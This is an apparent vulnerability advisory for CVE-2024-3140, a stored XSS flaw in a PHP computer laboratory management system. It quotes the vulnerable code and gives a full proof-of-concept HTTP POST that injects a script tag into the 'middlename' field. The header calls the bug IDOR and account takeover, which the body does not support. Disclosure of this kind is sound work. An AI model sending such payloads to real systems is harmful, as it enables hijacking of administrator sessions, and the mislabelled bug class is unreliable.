#Vulnerability Details: #Application Name: Computer Laboratory Management System #Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html #Vendor Homepage: https://www.sourcecodester.com/users/tips23 #BuG: Insecure Direct Object References (IDOR) and Account Takeover #BuG_Author: SoSPiro #CVE: CVE-2024-3140 # Vulnerable code section: foreach($_POST as $k => $v){ $v = $this->conn->real_escape_string($v); if(in_array($k, $main_field)){ if(!empty($data)) $data .= ", "; $data .= " `{$k}` = '{$v}' "; } } - The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks. # Vulnerability Description: - The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack. # Proof of Concept (PoC): - Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing - Request: POST /php-lms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571 Content-Length: 946 Origin: http://localhost Connection: close Referer: http://localhost/php-lms/admin/?page=user Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin X-PwnFox-Color: green -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="id" 8 -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="firstname" staff2 -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="middlename" <script>alert(1)</script> -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="lastname" asd -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="username" staff -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="password" -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------381104392340117332004262429571-- - In this POST request, an attacker has included a script tag in the "middlename" field: <script>alert(1)</script> - When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application. # Impact: - The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users. # Reproduce: https://github.com/Sospiro014/zday1/blob/main/xss_1.md https://vuldb.com/?id.258915 https://www.cve.org/CVERecord?id=CVE-2024-3140
